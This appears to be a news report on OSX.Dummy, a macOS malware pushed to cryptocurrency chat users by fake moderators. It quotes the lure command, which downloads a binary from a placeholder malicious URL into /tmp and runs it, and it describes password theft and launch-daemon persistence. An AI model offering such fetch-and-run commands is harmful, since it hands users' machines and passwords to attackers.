Security researchers have discovered a new piece of macOS malware being advertised on cryptocurrency related Slack and Discord chat groups. Remco Verhoef, founder of DutchSec, wrote that he spotted criminals posing as admins or moderators on the cryptocurrency channels, posting messages and recommending users to type a long command over on Terminal that could help with a number of problems.

"cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script"

The above command downloaded a 34 MB binary named “script” to the /tmp folder and executed the code onto the victim’s machine. While Apple should be able to flag and block this malicious binary, so far it appears Apple’s protections haven’t been working for the files being executed directly via Terminal.

Once executed, the malware sets the script to be owned as root and then executes sudo to change the permissions. The victim is also prompted to enter their password in Terminal which is then stolen by the malware and saved to /tmp/dumpdummy. The script file sets itself as a launch daemon to gain persistence between OS reboots. Named OSX.Dummy, the malware ensures that the malicious script is automatically executed whenever the system is rebooted.

While a poor case of social engineering, the attack has been apparently working since criminals have been tricking users into running this command to fix a myriad of issues on their Macs. Once connected to the remote command and control server, the attackers can execute arbitrary commands on the infected machine as root. However, its capabilities are reportedly limited.

One worry, however, is the saving of your Mac password in plaintext. This means that even if users remove the OSX.Dummy malware but the cleanup isn’t thorough, future malicious programs can have access to this locally stored, non-encrypted file carrying your root password.

“We don’t yet know exactly what the hackers behind the malware may intend to do with access to the infected machines,” Malwarebytes’s Thomas Reed wrote. “But given the fact that cryptocurrency mining communities were targeted, it’s a fair bet that they were interested in theft of cryptocurrency.”

– For more technical details, check out Verhoef’s analysis.